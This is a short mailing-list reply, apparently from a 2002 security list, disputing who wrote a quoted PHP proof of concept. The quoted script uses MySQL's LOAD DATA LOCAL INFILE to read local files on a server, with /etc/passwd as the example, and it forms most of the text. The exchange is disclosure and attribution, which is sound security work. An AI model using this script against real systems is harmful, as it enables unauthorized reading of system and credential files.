Hi there, Please see http://botanicus.net/dw/sec.html - I wrote about this in February. Prior to that, other people have claimed to have come across this too. On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote: > Attacker can use PHP and mySQL to read some local file following this way: > > # Create a database (mySQL) and upload this file to your server > PHP Code: viewfile.php (programmed by Luke) > > ====================================================== > <? > // config this data > $dbhost = ""; > $dbuser = ""; > $dbpasswd = ""; > $dbname = ""; > $file = "/etc/passwd"; // filename that you wanna view > > // shell code > echo "<pre>"; > > mysql_connect ($dbhost, $dbuser, > $dbpasswd); > $sql = array ( > "USE $dbname", > > 'CREATE TEMPORARY TABLE ' . ($tbl > = 'A'.time > ()) . ' (a LONGBLOB)', > > "LOAD DATA LOCAL INFILE '$file' INTO > TABLE > $tbl FIELDS " > . "TERMINATED BY > '__THIS_NEVER_HAPPENS__' " > . "ESCAPED BY '' " > . "LINES TERMINATED BY > '__THIS_NEVER_HAPPENS__'", > > "SELECT a FROM $tbl LIMIT 1" > ); Umm, this is my code. Please check any good Bugtraq archive for proof of this fact. This is pretty much identical, except my English is better :-). > Luke (HVA) > http://www.hackervn.net Dave Wilson.
